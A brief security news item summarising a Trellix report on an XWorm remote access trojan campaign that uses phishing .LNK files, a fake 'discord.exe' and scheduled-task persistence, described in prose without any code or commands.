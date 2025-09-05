GBHackers News reports that the XWorm remote access trojan has become even stealthier with its utilization of seemingly legitimate filenames resembling apps in a recent attack campaign.

Illicit actors have distributed phishing emails with a covert .LNK file, which prompts nefarious PowerShell commands commencing the multi-stage infection process upon execution, according to a Trellix Advanced Research Center report.

Initial delivery of a text file into the temporary directory of targeted systems is followed by the download of the 'discord.exe' file, which deploys a pair of malicious executables, with the first deactivating Windows Firewall and the second containing XWorm.

While it self-terminates upon identifying virtualization, XWorm taps PowerShell commands to prevent Windows Defender detection and guarantees persistence on other environments through the 'XClient' scheduled task before proceeding with the remote execution of numerous commands that enable distributed denial-of-service intrusions, URL redirections, system shutdowns, and data gathering for reconnaissance activities.